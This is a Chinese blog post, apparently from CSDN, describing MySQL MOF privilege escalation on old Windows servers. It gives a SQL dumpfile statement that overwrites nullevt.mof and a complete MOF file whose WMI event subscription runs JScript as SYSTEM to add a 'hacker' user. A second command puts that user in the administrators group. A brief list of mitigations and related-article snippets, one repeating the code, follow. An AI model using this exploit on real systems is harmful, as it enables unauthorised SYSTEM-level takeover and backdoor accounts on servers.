Mysql——mof提权

最新推荐文章于 2023-03-09 23:28:02 发布
最新推荐文章于 2023-03-09 23:28:02 发布
阅读量1.9k 收藏 4
点赞数 1
分类专栏: 漏洞提权 文章标签: mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/106618559
版权
mof提权
原理

在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以system权限执行一次,所以,只要我们将想要的操作通过代码存储到这个mof文件中,就可以实现权限提升
 

利用条件
  1. 仅限windows 及适用于windows server2003及以下的版本
  2. mysql用户具有root权限(对上面那个目录可写)
  3. 关闭了secure-file-priv
     
利用方式

拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权

使用sql语句,通过mysql的dumpfile操作将恶意mof文件拷贝到服务器的c:/windows/system32/wbem/mof/目录下,将系统当中默认的nullevt.mof给替换掉,进而让系统执行我们这个恶意的mof文件

select load_file('mof提权文件及路径') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

mof提权代码
nullevt.mof

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net user hacker 123456 /add\")";
    //cmd以system权限执行的语句
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

再将执行命令net user hacker 123456 /add换为net localgroup administrators hacker /add即可将hacker用户添加至administrators管理员组

安全防范

(1) 对mysql目录权限进行严格限制
(2) 设置复杂的root账号密码
(3) 设置c:/windows/system32/wbem目录为不可写

 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mysql数据库提权——MOF提权
cxrpty的博客
03-11 692
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡,应用在win2008以下的系统,Mysql5.7以下(--secure_file_prive:此配置写文件不限制) 实验环境:windows2003 实验步骤: 一、搭建环境 在windows2003上安装3...
mof提权文件nullevt.mof
03-12
其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....
[WEB安全]MySQl提权 mof、udf过程详解
网络安全知识分享
12-17 3178
MySQL提权〇、Mysql提权的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof提权0、环境搭建1、原理2、条件3、开始4、删号二、UDF提权0、原理1、步骤2、实操 〇、Mysql提权的必备条件 Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
mysql mof提权原理_Day3——提权学习之MySQL数据库(MOF提权
weixin_29302047的博客
02-01 104
0x00 原理利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。0x01 利用条件具备Mysql的root权限0x02 提权关键导入nullevt.mof0x03 提权步骤1、生成 nullevt.mof文件,上传文件到可写目录#pragma namespace(...
MySQL数据库UDF提权学习
Goodric的博客
07-21 1200
数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。 除Access数据库外,其他数据库基本都存在数据库提权的可能。
提权——MySQL mof提权及启动项提权简述
z1756227332的博客
03-14 272
Mof提权的利用方法 将代码保存为.mof文件 #pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select ...
后渗透—— 数据库之MOF提权
爱国小白帽
03-12 1365
提权原理: mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户...
MySQL数据库提权学习
Goodric的博客
07-22 245
—之前测试过MySQL的udf提权方式,现在对MySQL的其它两种方式进行测试与学习。————
mysql提权数据库司机_新人开车——mysql各种提权
weixin_39623082的博客
01-27 65
比如我入侵一个网站,通过查找数据库配置文件找到root相关的密码信息,可以尝试提权服务器。。。/data/common.inc.php这个文件存放数据库配置信息,一般可以查询相关关键字的文件,这里可以找到root密码。查找到数据库账号密码后,连接上服务器的数据库。连接数据库: mysql.exe -u账号 -p密码 -hip地址一、启动项提权原理:利用高权限的root导入一个vbs脚本到启动项里面...
vulnhub之mysql_udf提权
qq_36585338的博客
03-09 403
Linux 提权数据库MYSQL_UDF
Mysql UDF、MOF、反链端口提权.zip
12-14
Mysql UDF、MOF、反链端口提权
msf攻击Mysql服务.docx
04-26
3. **exploit/windows/mysql/mysql_mof**:这个模块利用Microsoft Object Definition Language (MOF)文件,可以触发远程代码执行,特别是在Windows MySQL服务器上进行提权。 4. **exploit/windows/mysql/...
MOF_V2.5.1
07-13
### MOF_V2.5.1 核心规范解析 #### 一、概述 MOF (Meta Object Facility) 是由 Object Management Group (OMG) 开发的一种标准规范,旨在为对象建模提供一种统一的方法。它允许开发人员定义元模型(即关于数据模型...
基于MOF的企业架构模型仓库
03-02
本文内容包括:解决方案概述上下文环境解决方案架构基于MOF的EA模型语言(EAML)模型转换结论引用注释参考资料来自RationalEdge:本文介绍了Unisys公司所完成的为美国联邦政府大规模组织构建核心企业架构(EA)的...
windows内核提权漏洞发现与利用
Zlirving_的博客
07-07 1306
漏洞介绍 计算机有个地方叫作缓存区。程序缓存的大小是事先设置好的,若用户输入数据的大小超过缓存区的大小则会发生溢出   漏洞影响 系统内核溢出漏洞提权是一种通用的提权方法,攻击者通常可以使用这类方法绕过系统的所有安全限制。攻击者利用漏洞的关键是目标系统没有及时安装补丁,就会让攻击者有机可乘。如果攻击者想要通过这种方法提权,就必须找出目标中的0day漏洞   漏洞发现 0x01 手动执行命令发现缺失补丁 通过各种手段获取目标主机shell后,查看当前权限 通过systeminfo查看机器
Mysql——udf提权
Zlirving_的博客
05-29 1226
udf提权 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用 原理 UDF提权是利用MYSQL的自定义函数功能,构造特定得DLL将Mysql账号转化为系统system权限   利用条件 可利用于windows系统,linux系统 Windows文件是dll文件;linux里面的文件是
windows PR提权
Zlirving_的博客
07-09 1117
漏洞概述 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 受影响系统 Microsoft Windows XP x64 SP2 Microsoft Windows XP x64 Microsoft Wind
sudo缓冲区溢出漏洞复现(CVE-2021-3156)
Zlirving_的博客
02-03 884
目录漏洞概述影响版本漏洞复现判断环境是否存在漏洞exp地址手工漏洞检测修复建议 漏洞概述 1月26日,sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统r
mysql mof 提权
最新发布
05-31
MySQL MOF(Management Object Format)提权指的是攻击者利用MySQL服务器中的MOF漏洞来执行任意代码,从而实现提权攻击。MOF是一种用于描述Windows系统管理对象的格式,它可以被用来创建、修改和查询Windows系统对象。MySQL服务器中的MOF提权漏洞是由于MySQL服务器使用了WMI(Windows Management Instrumentation)组件,而WMI组件中存在漏洞导致的。 攻击者可以利用MOF提权漏洞来执行任意代码,从而完全控制MySQL服务器。具体来说,攻击者可以使用以下方法来实现MOF提权: 1. 利用MOF文件中的漏洞来执行任意代码; 2. 修改MOF文件中的内容,从而实现提权; 3. 利用MOF文件中的反射注入漏洞来执行任意代码; 4. 利用MOF文件中的DLL劫持漏洞来执行任意代码。 为了避免MOF提权漏洞的发生,建议用户在使用MySQL服务器时,遵循以下几点建议: 1. 及时更新MySQL服务器和操作系统的补丁; 2. 对MySQL服务器进行安全配置,限制外部访问; 3. 建立网络安全防火墙,限制对MySQL服务器的访问; 4. 对MOF文件进行限制,只允许特定用户或组对其进行修改和查询; 5. 限制MySQL管理员的权限,只允许特定的用户或组执行MySQL操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值